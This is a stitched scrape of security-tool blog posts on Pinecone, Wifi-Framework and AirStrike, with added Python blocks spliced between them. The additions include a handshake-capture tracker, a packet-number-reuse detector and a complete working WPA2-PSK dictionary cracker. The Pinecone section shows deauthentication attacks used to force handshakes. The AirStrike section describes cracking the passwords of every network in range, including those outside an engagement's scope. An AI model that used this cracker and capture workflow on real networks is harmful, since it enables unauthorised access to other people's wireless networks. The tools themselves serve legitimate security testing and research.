Pinecone, execute <code>python3 pinecone.py</code> from within the project root folder:</p> <div><pre><code>root@kali:~/pinecone# python pinecone.py <br />[i] Database file: ~/pinecone/db/database.sqlite<br />pinecone > <br /></code></pre></div> <p dir="auto">Pinecone is controlled via a Metasploit-like command-line interface. 
You can type <code>help</code> to get the list of available commands, or <code>help 'command'</code> to get more information about a specific command:</p> <div><pre><code>pinecone > help<br /><br />Documented commands (type help &lt;topic&gt;):<br />========================================<br />alias help load pyscript set shortcuts use<br />edit history py quit shell unalias <br /><br />Undocumented commands:<br />======================<br />back run stop<br /><br />pinecone > help use<br />Usage: use module [-h]<br /><br />Interact with the specified module.<br /><br />positional arguments:<br /> module module ID<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /></code></pre></div> <p dir="auto">Use the command <code>use 'moduleID'</code> to activate a Pinecone module. Tab auto-completion shows the list of currently loaded modules:</p> <div><pre><code>pinecone > use <br />attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap <br />daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake<br />pinecone > use discovery/recon <br />pcn module(discovery/recon) > <br /></code></pre></div> <p dir="auto">Every module has options, which can be listed by typing <code>help run</code> or <code>run --help</code> once the module is activated. Most modules have default values for their options; check them before running:</p> <div><pre><code>pcn module(discovery/recon) > help run<br />usage: run [-h] [-i INTERFACE]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -i INTERFACE, --iface INTERFACE<br /> monitor mode capable WLAN interface (default: wlan0)<br /></code></pre></div> <p dir="auto">When a module is activated, you can use the <code>run [options...]</code> command to start its functionality. 
Modules report their execution state as they run:</p> <div><pre><code>pcn script(attack/wpa_handshake) > run -s TEST_SSID<br />[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...<br />................................................................<br />Sent 64 packets.<br />[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...<br /></code></pre></div> <p dir="auto">If a module runs in the background (for example, <em>scripts/infrastructure/ap</em>), you can stop it with the <code>stop</code> command while it is running.</p> <div>When you are done with a module, deactivate it with the <code>back</code> command, or activate another one by issuing <code>use</code> again. <p dir="auto">Shell commands may be executed with the <code>shell</code> command or the <code>!</code> shortcut:</p> <div><pre><code>pinecone > !ls<br />LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md<br /></code></pre></div> <p dir="auto">Currently, the Pinecone <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> SQLite database is stored in the <em>db/</em> directory inside the project root folder. 
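</p> <p dir="auto">Before a captured handshake is worth handing to a cracker, the monitoring step of <em>scripts/attack/wpa_handshake</em> shown above has to decide which EAPOL-Key frames belong together. The following stdlib-only Python is an added example, not Pinecone code: it classifies EAPOL-Key frames into messages 1 to 4 from their Key Information flags and reports a session as crackable once ANonce, SNonce and the MIC-carrying message 2 are known. The frames, addresses and nonces are constructed; a real tool would take the EAPOL payload from captured 802.11 data frames.</p>

```python
"""Classify EAPOL-Key frames into 4-way handshake messages 1-4 and decide when a
crackable WPA2 handshake has been captured. Added example, not Pinecone code.
Input: raw EAPOL frame (what follows the LLC/SNAP header) plus transmitter and
receiver MACs. All frames below are constructed with build_eapol_key()."""
import struct

# Key Information flags (IEEE 802.11-2016, 12.7.2 "EAPOL-Key frames")
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200

# EAPOL header (version, type, body length) + fixed EAPOL-Key fields: descriptor type,
# key info, key length, replay counter, nonce, IV, RSC, ID, MIC, key data length (99 bytes)
EAPOL_KEY = struct.Struct("!BBHBHHQ32s16sQQ16sH")


def parse_eapol_key(frame):
    """Return the handshake-relevant fields, or None if this is not an EAPOL-Key frame."""
    if len(frame) < EAPOL_KEY.size:
        return None
    (_ver, ptype, _blen, desc, key_info, _klen, replay,
     nonce, _iv, _rsc, _id, mic, key_data_len) = EAPOL_KEY.unpack_from(frame)
    if ptype != 3 or desc not in (2, 254):  # EAPOL-Key with RSN (2) or WPA (254) descriptor
        return None
    return {"key_info": key_info, "replay": replay, "nonce": nonce,
            "mic": mic, "key_data_len": key_data_len}


def message_number(key_info, key_data_len):
    """Map Key Information flags to message 1..4; 0 for anything else (e.g. group key)."""
    if not key_info & KEY_INFO_PAIRWISE:
        return 0
    ack, mic = bool(key_info & KEY_INFO_ACK), bool(key_info & KEY_INFO_MIC)
    if ack and not mic:
        return 1
    if ack and mic and key_info & KEY_INFO_INSTALL:
        return 3
    if not ack and mic:
        # M2 carries the RSN IE in key data; M4 has Secure set (WPA2) and empty key data
        return 4 if key_info & KEY_INFO_SECURE or key_data_len == 0 else 2
    return 0


class HandshakeTracker:
    """Per-(AP, client) state. feed() returns True once ANonce, SNonce, the M2 frame
    and its MIC are known, which is everything a dictionary attack needs."""

    def __init__(self):
        self.sessions = {}

    def feed(self, src, dst, frame):
        key = parse_eapol_key(frame)
        if key is None:
            return None
        n = message_number(key["key_info"], key["key_data_len"])
        if n in (1, 3):
            ap, client = src, dst
        elif n in (2, 4):
            ap, client = dst, src
        else:
            return None
        s = self.sessions.setdefault((ap, client), {})
        if n == 1:
            s.clear()                                   # fresh handshake: forget old nonces
            s.update(anonce=key["nonce"], rc=key["replay"])
        elif n == 2:
            if "rc" in s and key["replay"] != s["rc"]:
                return False                            # answers a different M1: would never crack
            s.update(snonce=key["nonce"], mic=key["mic"], m2=frame, rc=key["replay"])
        elif n == 3:
            if "rc" in s and key["replay"] != s["rc"] + 1:
                return False
            s["anonce"] = key["nonce"]                  # M3 repeats ANonce, so M2+M3 also suffices
        return all(f in s for f in ("anonce", "snonce", "mic", "m2"))


def build_eapol_key(key_info, replay, nonce, mic=b"\x00" * 16, key_data=b""):
    """Constructed EAPOL-Key frame with RSN descriptor; body length is 95 + key data."""
    hdr = EAPOL_KEY.pack(2, 3, 95 + len(key_data), 2, key_info, 16, replay,
                         nonce, b"\x00" * 16, 0, 0, mic, len(key_data))
    return hdr + key_data


AP, STA = "00:11:22:33:44:55", "66:77:88:99:aa:bb"          # sample addresses
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))     # sample nonces
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # constructed RSN IE
M1 = build_eapol_key(KEY_INFO_PAIRWISE | KEY_INFO_ACK, 1, ANONCE)
M2 = build_eapol_key(KEY_INFO_PAIRWISE | KEY_INFO_MIC, 1, SNONCE, b"\xab" * 16, RSN_IE)
M3 = build_eapol_key(KEY_INFO_PAIRWISE | KEY_INFO_INSTALL | KEY_INFO_ACK | KEY_INFO_MIC
                     | KEY_INFO_SECURE, 2, ANONCE, b"\xcd" * 16, RSN_IE)
M4 = build_eapol_key(KEY_INFO_PAIRWISE | KEY_INFO_MIC | KEY_INFO_SECURE, 2, b"\x00" * 32, b"\xef" * 16)


def demo():
    """Full exchange: crackable as soon as M2 follows the M1 it answers."""
    t = HandshakeTracker()
    return [t.feed(AP, STA, M1), t.feed(STA, AP, M2), t.feed(AP, STA, M3), t.feed(STA, AP, M4)]


def demo_stale_m2():
    """An M2 whose replay counter does not match the M1 we saw is rejected."""
    t = HandshakeTracker()
    t.feed(AP, STA, M1)
    stale = build_eapol_key(KEY_INFO_PAIRWISE | KEY_INFO_MIC, 7, SNONCE, b"\xab" * 16, RSN_IE)
    return t.feed(STA, AP, stale)


if __name__ == "__main__":
    print(demo(), demo_stale_m2())
```

<p dir="auto">The replay-counter check is the part worth copying: after a deauth, clients reconnect with fresh nonces, and pairing message 1 of one handshake with message 2 of another yields a capture that no wordlist will ever crack. Message 4 is told apart from message 2 by the Secure flag or, for WPA (TKIP), by its empty key data.</p> <p dir="auto">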
All the temporary files that Pinecone needs to use are stored in the <em>tmp/</em> directory also under the project root folder.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/pinecone-wifi/pinecone" rel="nofollow" target="_blank" title="Download Pinecone">Download Pinecone</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-79612526975714349202022-01-12T17:30:00.001-03:002022-01-12T17:30:00.299-03:00Wifi-Framework - Wi-Fi Framework For Creating Proof-Of-Concepts, Automated Experiments, Test Suites, Fuzzers, And More...<p><a href="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/s1600/wifi-framework_1_framework-794677.png" style="text-align: -webkit-center;"><img alt="" border="0" height="270" id="BLOGGER_PHOTO_ID_7051801552786097458" src="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/w640-h270/wifi-framework_1_framework-794677.png" width="640" /></a></p><br /> <p dir="auto">We present a framework to more easily perform Wi-Fi experiments. It can be used to create fuzzers, implement new attacks, create proof-of-concepts to test for vulnerabilities, automate experiments, implement test suites, and so on.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <p dir="auto">The main advantage of the framework is that it <strong>allows you to reuse Wi-Fi functionality of Linux to more easily implement attacks and/or tests</strong>. For instance, the framework can connect to (protected) Wi-Fi networks for you and can broadcast beacons for you when testing clients. In general, any Wi-Fi functionality of Linux can be reused to more quickly implement attacks/tests. 
The framework accomplishes this by executing <em>test cases</em> on top of the <em>hostap</em> user space daemon.</p> <p align="center" dir="auto"> <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/framework.png" rel="nofollow" target="_blank" title="Wi-Fi Framework for creating proof-of-concepts, automated experiments, test suites, fuzzers, and more. (1)"></a><a href="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/s1600/wifi-framework_1_framework-794677.png"><img alt="" border="0" height="270" id="BLOGGER_PHOTO_ID_7051801552786097458" src="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/w640-h270/wifi-framework_1_framework-794677.png" width="640" /></a> <br /> <em>Overview of the Wi-Fi Daemon and Framework components.</em> </p> <p dir="auto">If you are new to performing Wi-Fi experiments on Linux it is highly recommended to first read the <a href="https://github.com/vanhoefm/libwifi/blob/master/docs/linux_tutorial.md" rel="nofollow" target="_blank" title="libwifi Linux Tutorial">libwifi Linux Tutorial</a>. 
When you are implementing basic Wi-Fi attacks without the need to reuse Linux functionality, the framework provides limited advantages, and you can instead consider implementing attacks directly in Scapy, optionally with the <a href="https://github.com/vanhoefm/libwifi" rel="nofollow" target="_blank" title="libwifi">libwifi</a> library.</p> <h2 dir="auto">Usage</h2> <p dir="auto">To use the framework:</p> <ol dir="auto"> <li> <p dir="auto"><a href="https://github.com/domienschepers/wifi-framework/blob/master/setup" rel="nofollow" target="_blank" title="Install it">Install it</a>.</p> </li> <li> <p dir="auto">Read the <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/USAGE.md" rel="nofollow" target="_blank" title="usage tutorial">usage tutorial</a>.</p> </li> </ol> <p dir="auto"><a id="user-content-id-example" target="_blank" title="Wi-Fi Framework for creating proof-of-concepts, automated experiments, test suites, fuzzers, and more. (6)"></a></p> <h2 dir="auto">Example</h2> <p dir="auto">Say you want to test whether a client ever encrypts frames using an all-zero key. This can happen during a <a href="https://www.krackattacks.com/#demo" rel="nofollow" target="_blank" title="key reinstallation attack">key reinstallation attack</a>. By using the framework you do not need to reimplement all functionality of an access point, but only need to write the following test case:</p> <div class="highlight highlight-source-python position-relative overflow-auto"><pre><code>class ExampleKrackZerokey(Test):<br />    name = "example-krack-zero-key"<br />    kind = Test.Authenticator<br /><br />    def __init__(self):<br />        super().__init__([<br />            # Replay 4-Way Handshake Message 3/4.<br />            Action( trigger=Trigger.Connected, action=Action.Function ),<br />            # Receive all frames and search for one encrypted with an all-zero key.<br />            Action( trigger=Trigger.NoTrigger, action=Action.Receive ),<br />            # When we receive such a frame, we can terminate the test.<br />            Action( trigger=Trigger.Received, action=Action.Terminate )<br />        ])<br /><br />    def resend(self, station):<br />        # Resend 4-Way Handshake Message 3/4.<br />        station.wpaspy_command("RESEND_M3 " + station.clientmac )<br /><br />    def receive(self, station, frame):<br />        if frame[Dot11].addr2 != station.clientmac or not frame.haslayer(Dot11CCMP):<br />            return False<br /><br />        # Check if the CCMP-encrypted frame can be decrypted using an all-zero key<br />        plaintext = decrypt_ccmp(frame.getlayer(Dot11), tk=b"\x00"*16)<br />        if plaintext is None: return False<br /><br />        # We received a valid plaintext frame!<br />        log(STATUS,'Client encrypted a frame with an all-zero key!', color="green")<br />        return True</code></pre></div> <p dir="auto">The above test case 
will create an access point that clients can connect to. After a client connects, message 3 of the 4-way handshake is retransmitted to it. A <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> client will then start using an all-zero <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> key, which the test case detects automatically.</p> <p dir="auto">You can run the above test case on simulated Wi-Fi radios (mac80211_hwsim) as follows:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="./setup/setup-hwsim.sh 4 source setup/venv/bin/activate ./run.py wlan1 example-krack-zero-key"><pre><code>./setup/setup-hwsim.sh 4<br />source setup/venv/bin/activate<br />./run.py wlan1 example-krack-zero-key<br /></code></pre></div> <p dir="auto">To test it, connect a client to the created access point from a second simulated interface:</p> <div><pre><code>./hostap.py wlan2<br /></code></pre></div> <p dir="auto">By changing the <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/USAGE.md#id-network-configuration" rel="nofollow" target="_blank" title="network configuration">network configuration</a>, this AP can be configured to use WPA2 or WPA3 and/or enterprise authentication, without any change to the test case we wrote! 
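</p> <p dir="auto">The all-zero key is one symptom of a key reinstallation; the other is that the client resets its CCMP packet number and reuses nonces, which means keystream reuse under whatever key is installed. The following stdlib-only Python is an added example, not wifi-framework code, of that second check: it parses the 8-byte CCMP header and flags any transmitter that sends a packet number it has already used for the same key ID. The frames are constructed; in a framework test case the header bytes would come from the CCMP layer of the received frame.</p>

```python
"""Detect CCMP packet-number (nonce) reuse, the second symptom of a key
reinstallation. Added example, not wifi-framework code. Frames are modelled as the
transmitter address plus the 8-byte CCMP header that follows the 802.11 MAC header;
all samples are constructed."""

CCMP_EXT_IV = 0x20   # bit 5 of the flags byte ("extended IV"), set for every CCMP frame


def parse_ccmp_header(hdr):
    """Return (key_id, pn) from a CCMP header laid out as PN0 PN1 rsvd flags PN2..PN5."""
    if len(hdr) < 8 or not hdr[3] & CCMP_EXT_IV:
        raise ValueError("not a CCMP header")
    key_id = hdr[3] >> 6
    pn = (hdr[0] | hdr[1] << 8 | hdr[4] << 16 | hdr[5] << 24
          | hdr[6] << 32 | hdr[7] << 40)
    return key_id, pn


class PnMonitor:
    """Track the highest PN seen per (transmitter, key ID) and flag any PN that does not
    increase. A client that reinstalls its key restarts at PN 1, so its next frames all
    collide with nonces already used under that key."""

    def __init__(self):
        self.highest = {}

    def observe(self, transmitter, hdr, retry=False):
        """Return a finding dict for a reused PN, or None if the PN advanced normally."""
        key_id, pn = parse_ccmp_header(hdr)
        if retry:                       # 802.11 retransmissions repeat the PN; not a reset
            return None
        key = (transmitter, key_id)
        prev = self.highest.get(key)
        self.highest[key] = max(prev or 0, pn)
        if prev is not None and pn <= prev:
            return {"transmitter": transmitter, "key_id": key_id, "pn": pn, "highest": prev}
        return None


def ccmp_header(pn, key_id=0):
    """Constructed CCMP header for a 48-bit packet number pn."""
    return bytes([pn & 0xff, (pn >> 8) & 0xff, 0, CCMP_EXT_IV | (key_id << 6),
                  (pn >> 16) & 0xff, (pn >> 24) & 0xff, (pn >> 32) & 0xff, (pn >> 40) & 0xff])


def demo():
    """Client sends PN 1, 2, 3, reinstalls its key, then sends PN 1, 2 again."""
    mon = PnMonitor()
    client = "66:77:88:99:aa:bb"   # sample address
    return [mon.observe(client, ccmp_header(pn)) is not None for pn in (1, 2, 3, 1, 2)]


def demo_retry():
    """A retransmitted frame (same PN, Retry bit set) must not count as a reset."""
    mon = PnMonitor()
    first = mon.observe("66:77:88:99:aa:bb", ccmp_header(1))
    return first, mon.observe("66:77:88:99:aa:bb", ccmp_header(1), retry=True)


if __name__ == "__main__":
    print(demo(), demo_retry())
```

<p dir="auto">Two caveats: 802.11 retransmissions legitimately repeat the packet number (hence the <code>retry</code> parameter, to be fed from the frame's Retry bit), and a monitor like this cannot tell a reinstallation from a frame replayed by a third party, which is why the framework's own test acts as the AP and triggers the retransmission itself.</p> <p dir="auto">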
Additional benefits of using the framework in this example are:</p> <ul dir="auto"> <li>No need to manually broadcast beacons</li> <li>The <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> and association stage is handled by the framework</li> <li>The WPA2 and/or WPA3 handshake is handled by the framework</li> <li>Injected packets will be automatically retransmitted by the Linux kernel</li> <li>Packets sent <em>towards</em> the AP will be acknowledged</li> <li>Sleep mode of the client is automatically handled by the kernel</li> <li>...</li> </ul> <p dir="auto">See <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/EXAMPLES.md" rel="nofollow" target="_blank" title="a detailed description of all our examples">a detailed description of all our examples</a> for more examples.</p> <h2 dir="auto">Publications</h2> <p dir="auto">This work was published at the ACM Conference on Security and Privacy in <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> and Mobile Networks (WiSec '21):</p> <ul dir="auto"> <li><a href="https://dl.acm.org/doi/10.1145/3448300.3468261" rel="nofollow" target="_blank" title="DEMO: A Framework to Test and Fuzz Wi-Fi Devices">DEMO: A Framework to Test and Fuzz Wi-Fi Devices</a></li> </ul> <p dir="auto">Works that have used this framework or a similar one:</p> <ul dir="auto"> <li><a href="https://github.com/vanhoefm/fragattacks" rel="nofollow" target="_blank" title="FragAttacks: Fragmentation & Aggregation Attacks">FragAttacks: Fragmentation & Aggregation Attacks</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/domienschepers/wifi-framework" rel="nofollow" target="_blank" title="Download Wifi-Framework">Download 
Wifi-Framework</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-8236688380809962292021-12-05T08:30:00.005-03:002021-12-05T08:30:00.296-03:00AirStrike - Automatically Grab And Crack WPA-2 Handshakes With Distributed Client-Server Architecture<p align="center" dir="auto"><a href="http://3.bp.blogspot.com/-kuWqdU_8A-g/YZ3S2bha4gI/AAAAAAAA4Mc/c0yX89zqmbsVayuJhY_L07SatqzhXQ_WwCK4BGAYYCw/s1600/AirStrike_1_logo-771856.png"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7034010025565282818" src="http://3.bp.blogspot.com/-kuWqdU_8A-g/YZ3S2bha4gI/AAAAAAAA4Mc/c0yX89zqmbsVayuJhY_L07SatqzhXQ_WwCK4BGAYYCw/w596-h640/AirStrike_1_logo-771856.png" width="596" /></a> </p> <p align="center" dir="auto"> Tool that automates the <a href="https://www.kitploit.com/search/label/Cracking" target="_blank" title="cracking">cracking</a> of WPA-2 Wi-Fi <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> using a client-server architecture</p><span><a name='more'></a></span><p align="center" dir="auto"><br /></p> <h1 dir="auto">Requirements</h1> <p dir="auto">Airstrike uses the Hashcat Brain architecture, the <code>aircrack-ng</code> suite, the <code>entr</code> utility and some helper scripts.</p> <p dir="auto">You can use the <code>install.sh</code> script to download all dependencies (if you're on a system that has access to apt or pacman; if you're using Gentoo or Void Linux, you'll have to install hcxtools by hand, as it is not available in their repos, or maybe I've missed something. 
Some other uncommon distros are not covered either: for example, Alpine doesn't have a hashcat package. If your distro is exotic, you can use Nix on it, as all the needed packages are in nixpkgs.)</p> <p dir="auto">If you're using Nix/NixOS, you can jump into a Nix shell with the needed dependencies using: <code>nix-shell -p hashcat <a href="https://www.kitploit.com/search/label/Hashcat-Utils" target="_blank" title="hashcat-utils">hashcat-utils</a> <a href="https://www.kitploit.com/search/label/Aircrack-ng" target="_blank" title="aircrack-ng">aircrack-ng</a> entr hcxtools</code></p> <h1 dir="auto">Usage</h1> <p dir="auto">Run <code>aircrack_server.sh</code> on the machine on which you want to crack passwords. This script builds the <code>aircrack_client.sh</code> file, which can be executed on any Linux host that is able to connect to the server started earlier. Upon execution, the client automatically captures handshakes, connects to the server and sends the captured data.</p> <p dir="auto">Whenever a password is successfully cracked by the server, the <code>watcher.sh</code> script prints it to the terminal on the server side.</p> <p dir="auto">The only required option flag for <code>airstrike_client.sh</code> is the <code>-w</code> flag: it specifies the wordlist that the server should use. The listening interface can be specified with the <code>-i</code> flag; by default, the current wireless interface is selected automatically. Additionally, <code>airstrike_client.sh</code> listens for WPA-2 data without any filter, so it will capture and crack the <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> of all Wi-Fi networks in range (whenever handshakes are exchanged). Be aware that this includes handshakes from networks outside your engagement scope, which will be submitted for cracking just the same.</p> <h1 dir="auto">Navigation</h1> <p dir="auto"><code>Ctrl + S</code> will send captured assets (Wi-Fi handshakes in <code>.hccapx</code> form) to the server. 
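</p> <p dir="auto">What the server does with a submitted handshake, as an added stdlib-only Python example (not AirStrike code, which delegates this step to hashcat): for each wordlist candidate it derives the PMK with PBKDF2, expands it into the PTK with the 802.11 PRF, and checks whether the resulting KCK reproduces the MIC carried in message 2. The arguments of <code>crack()</code> are exactly the fields a <code>.hccapx</code> record stores. The handshake below is constructed; the only external value is the PMK for passphrase "password" and SSID "IEEE", which is the IEEE 802.11i test vector.</p>

```python
"""Dictionary attack on a captured WPA2-PSK 4-way handshake, stdlib only.
Added example, not AirStrike code. The handshake is constructed here; the expected
PMK for "password"/"IEEE" is the IEEE 802.11i test vector."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the expensive step and the reason WPA2 cracking is GPU-bound."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label | 0x00 | data | i), i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces) = KCK|KEK|TK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol):
    """Key descriptor version 2 MIC: HMAC-SHA1 over the EAPOL frame with its MIC field
    (bytes 81..96) zeroed, truncated to 128 bits."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2):
    """Return the candidate whose KCK reproduces the MIC carried in message 2, else None."""
    target = eapol_m2[81:97]
    for passphrase in candidates:
        pmk = pmk_from_passphrase(passphrase, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), target):
            return passphrase
    return None


# --- constructed handshake (the fields a capture tool writes into .hccapx) ---
SSID = "IEEE"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def build_m2(snonce, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2: RSN descriptor, key info 0x010a (Pairwise|MIC, version 2)."""
    return struct.pack("!BBHBHHQ32s16sQQ16sH", 2, 3, 95, 2, 0x010a, 16, 1,
                       snonce, b"\x00" * 16, 0, 0, mic, 0)


def captured_m2(true_passphrase="password"):
    """Message 2 as a client configured with true_passphrase would have sent it."""
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, SSID),
                     AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_m2(SNONCE, eapol_mic(kck, build_m2(SNONCE)))


def demo():
    """Run a small constructed wordlist against the constructed capture."""
    wordlist = ["letmein", "Password1", "password", "hunter2"]
    return crack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_m2())


if __name__ == "__main__":
    print(demo())
```

<p dir="auto">Only key descriptor version 2 (HMAC-SHA1-128, the CCMP/WPA2 case) is handled; version 1 uses HMAC-MD5 and version 3 AES-128-CMAC. The 4096 PBKDF2 iterations per candidate are what makes the wordlist matter more than anything else on the server.</p> <p dir="auto">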
<code>Ctrl + I</code> displays information about capture progress.</p> <p dir="auto">These shortcuts can be used inside a running instance of <code>airstrike_client.sh</code>.</p> <blockquote> <p dir="auto">made with love by Red Code Labs &lt;*&gt;</p></blockquote> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redcode-labs/AirStrike" rel="nofollow" target="_blank" title="Download AirStrike">Download AirStrike</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77756113575259912652021-11-29T17:30:00.008-03:002021-11-29T17:30:00.275-03:00Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiGH5Xx6KQ8Jd109qlTWqnttbS0LwzBhCMAWLUj8A_4lwSHrfdQM-GXsCtbnn5Ecut728xiAo0GM7Sz3DJTEkZOEkcgaOxXYdrAXPJRuNPz3dHGT8UPCg8znBqqLtNTsi1wVep8Y3LjWN21gAZJSWAebUKgjZ44AEhGIQrRAHJL5wnfcgiv2w7nDhwP5A=s697" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="697" height="81" src="https://blogger.googleusercontent.com/img/a/AVvXsEiGH5Xx6KQ8Jd109qlTWqnttbS0LwzBhCMAWLUj8A_4lwSHrfdQM-GXsCtbnn5Ecut728xiAo0GM7Sz3DJTEkZOEkcgaOxXYdrAXPJRuNPz3dHGT8UPCg8znBqqLtNTsi1wVep8Y3LjWN21gAZJSWAebUKgjZ44AEhGIQrRAHJL5wnfcgiv2w7nDhwP5A=w200-h81" width="200" /></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhdi8i2IeXR7oL4cTPSV4N6B9AzcPuQ8PmPd8WXFYvrqRuT2ohxohzGS0QxO3CYtPxZDPxaue2JpblMMXaE9EwDNUEtlDQhG8OF3ZwOiiO_lA_BdMNMA56EcHgdRDLBtqKJE4esi1ODlpQBsgvCg_subZIO-MA6dOQWx13uIRN0-LuLNf4ZiWpO_D9Fxg=s624" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="624" height="84" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhdi8i2IeXR7oL4cTPSV4N6B9AzcPuQ8PmPd8WXFYvrqRuT2ohxohzGS0QxO3CYtPxZDPxaue2JpblMMXaE9EwDNUEtlDQhG8OF3ZwOiiO_lA_BdMNMA56EcHgdRDLBtqKJE4esi1ODlpQBsgvCg_subZIO-MA6dOQWx13uIRN0-LuLNf4ZiWpO_D9Fxg=w200-h84" width="200" /></a></div><p><br /></p> <h3 dir="auto">Features of Repository</h3> <p dir="auto">===================</p> <ul dir="auto"> <li>Hands-on <a href="https://www.kitploit.com/search/label/Digital%20Forensics" target="_blank" title="Digital Forensics">Digital Forensics</a> Labs: designed for Students and Faculty</li> <li>Linux-based lab: All labs are purely based on <a href="https://www.kali.org/downloads/" rel="nofollow" target="_blank" title="Kali Linux">Kali Linux</a></li> <li>Lab screenshots: Each lab has PPTs with instruction screenshots</li> <li>Comprehensive: Cover many topics in digital forensics</li> <li>Free: All tools are open source</li> <li>Updated: The project is funded by DOJ and will keep updating</li> <li>Two formalized forensic intelligence in JSON files based-on case studies</li></ul><span><a name='more'></a></span><div><br /></div> <h2 dir="auto">Table of Contents (updating)</h2> <ul dir="auto"> <li>Basic Computer Skills for Digital Forensics <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx" rel="nofollow" target="_blank" title="Number Systems">Number Systems</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/1_PC_Introduction.pptx" rel="nofollow" target="_blank" title="PC Introduction">PC Introduction</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/2_Win_command_line_tutorial.pptx" rel="nofollow" target="_blank" title="Windows">Windows </a><a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> 
